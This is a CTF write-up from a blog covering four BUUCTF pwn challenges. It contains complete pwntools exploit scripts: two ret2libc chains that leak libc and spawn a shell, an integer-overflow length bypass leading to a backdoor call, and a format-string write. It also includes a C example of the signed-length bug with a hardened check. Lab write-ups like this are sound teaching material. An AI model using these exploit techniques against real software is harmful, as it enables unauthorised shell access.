buuctf pwn (21~24)

Triathlon (Fifth Division)_2018_rop

32-bit ELF file. Looking at the program logic:
[image: decompiled program logic]
There is a stack overflow, but no system function and no /bin/sh string. Now look at the protections:
[image: binary protections]
So it is most likely a ret2libc problem. The script is as follows:

from pwn import *
from LibcSearcher import *
context(os = "linux", arch = "i386")
context.log_level = 'debug'
p=remote("node4.buuoj.cn",29721)
elf=ELF("./pwn21")
ret=0x08048199   # ret gadget (not used in this script)
main=0x80484C6   # return to main after the leak so the overflow can be triggered again

read_got=elf.got['read']
write_plt=elf.plt['write']

payload=b'a'*(0x88+4)+p32(write_plt)+p32(main)+p32(1)+p32(read_got)+p32(4)   # write(1, read_got, 4), then return to main
p.sendline(payload)
read_addr=u32(p.recv(4))
print(hex(read_addr))

libc = LibcSearcher('read',read_addr)        # search for a libc matching the leaked read address
libc_base = read_addr - libc.dump('read')    # compute the libc base from the leak
system = libc.dump('system')+libc_base
bin_sh = libc.dump('str_bin_sh')+libc_base

payload=b'a'*(0x88+4)+p32(system)+p32(0)+p32(bin_sh)
p.sendline(payload)

p.interactive()


bjdctf_2020_babyrop

64-bit ELF file. Looking at the program logic:
[image: decompiled program logic]
There is a stack overflow, and again no system function or /bin/sh string. Look at the protections again:
[image: binary protections]
So it should be a 64-bit ret2libc problem. The script is as follows:

from pwn import *
from LibcSearcher import *
context(os = 'linux',arch = 'amd64',log_level = 'debug')
p=remote("node4.buuoj.cn",29360)

elf=ELF("./pwn22")
puts_plt=elf.plt['puts']
read_got=elf.got['read']
main=0x4006AD
pop=0x0000000000400733 # pop rdi ; ret
ret=0x00000000004004c9 # ret gadget, used to keep the stack 16-byte aligned before calling system


p.recvuntil("Pull up your sword and tell me u story!\n")
payload=b'a'*(0x20+8)+p64(pop)+p64(read_got)+p64(puts_plt)+p64(main)   # puts(read_got) leaks read's address, then return to main
p.sendline(payload)

read_addr=u64(p.recv(6).ljust(8,b'\x00'))
print(hex(read_addr))
libc = LibcSearcher('read',read_addr)        # search for a libc matching the leaked read address
libc_base = read_addr - libc.dump('read')    # compute the libc base from the leak
system = libc.dump('system')+libc_base
bin_sh = libc.dump('str_bin_sh')+libc_base


p.recvuntil("Pull up your sword and tell me u story!\n")
payload=b'a'*(0x20+8)+p64(pop)+p64(bin_sh)+p64(ret)+p64(system)   # system("/bin/sh") with an extra ret for alignment
p.sendline(payload)

p.interactive()

If the connection times out, pick a different libc version; it usually works after a few more tries.

bjdctf_2020_babystack2

64-bit ELF file. Looking at the program logic:
[image: decompiled program logic]
The if check does not allow us to enter a number greater than 10, so we bypass it with an integer overflow: a negative length such as -1 passes the "greater than 10" check. I have written about this before; take a look below this article.

A backdoor function is provided:
[image: backdoor function]

The script is as follows:

from pwn import *
context(os = 'linux',arch = 'amd64',log_level = 'debug')
p=remote("node4.buuoj.cn",28233)
sys=0x400726   # address of the backdoor function
p.recvuntil("[+]Please input the length of your name:\n")
p.sendline(b'-1')   # negative length passes the "> 10" check but becomes a huge unsigned read count
payload=b'a'*(0x10+8)+p64(sys)   # overflow the buffer and overwrite the return address with the backdoor
p.sendline(payload)
p.interactive()

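To show why sending -1 works here, the following is an added example (not the write-up's or the challenge's own source, whose exact code is not on the page): a hypothetical reconstruction of a length check that only tests an upper bound on a signed int, next to a corrected check. The names, the 10-byte limit from the text and the 16-byte buffer size are assumptions.

```c
/* Added example, not from the write-up: hypothetical reconstruction of the
 * babystack2 bug class (signed length check), beside a hardened version. */
#include <limits.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <unistd.h>

#define NAME_MAX_LEN 10   /* the "not greater than 10" rule from the check */
#define NAME_BUF_SIZE 16  /* assumed size of the stack buffer */

/* Vulnerable check: only an upper bound is tested on a signed int, so a
 * negative length such as -1 is accepted. */
bool vulnerable_length_ok(int len) {
    return len <= NAME_MAX_LEN;
}

/* The count that read(2) actually receives: the signed int is converted to
 * size_t, so -1 becomes SIZE_MAX and the buffer bound no longer protects. */
size_t as_read_count(int len) {
    return (size_t)len;
}

/* Hardened check: reject negatives explicitly and bound by the real buffer. */
bool hardened_length_ok(int len) {
    return len >= 0 && len <= NAME_MAX_LEN && len < NAME_BUF_SIZE;
}

/* Read a name into a fixed stack buffer only after the hardened check.
 * Returns the number of bytes read, or -1 if the length was rejected. */
ssize_t read_name_safely(int fd, int len, char out[NAME_BUF_SIZE]) {
    if (!hardened_length_ok(len))
        return -1;
    ssize_t n = read(fd, out, (size_t)len);
    if (n >= 0)
        out[n] = '\0';   /* n <= NAME_MAX_LEN < NAME_BUF_SIZE, so this is in bounds */
    return n;
}

int main(void) {
    int samples[] = { 5, 10, 11, -1, INT_MIN };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        printf("len=%11d  vulnerable_ok=%d  hardened_ok=%d  read(2) count=%zu\n",
               samples[i], vulnerable_length_ok(samples[i]),
               hardened_length_ok(samples[i]), as_read_count(samples[i]));
    }
    return 0;
}
```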

jarvisoj_fm

32-bit ELF file. Looking at the program logic again:
[image: decompiled program logic]
This is a format string vulnerability; through it, x can be overwritten with the value 4. fmtstr_payload can be used, or the payload can be written by hand. First, find the offset:
[image: offset test]
The offset is 11. The script without fmtstr_payload is as follows:

from pwn import *
context(os = "linux", arch = "i386")
context.log_level = 'debug'
#p=process("./pwn24")
p=remote("node4.buuoj.cn",26446)
payload=p32(0x804A02C)+b'%11$n'   # the 4 address bytes already printed make %n write 4 into x
p.sendline(payload)
p.interactive()

The script using fmtstr_payload is as follows:

from pwn import *
context(os = "linux", arch = "i386")
context.log_level = 'debug'
#p=process("./pwn24")
p=remote("node4.buuoj.cn",26446)
payload=fmtstr_payload(11,{0x0804A02C:4})   # offset 11, write the value 4 to x
p.sendline(payload)
p.interactive()

Both versions work.


Origin blog.csdn.net/cainiao78777/article/details/128444538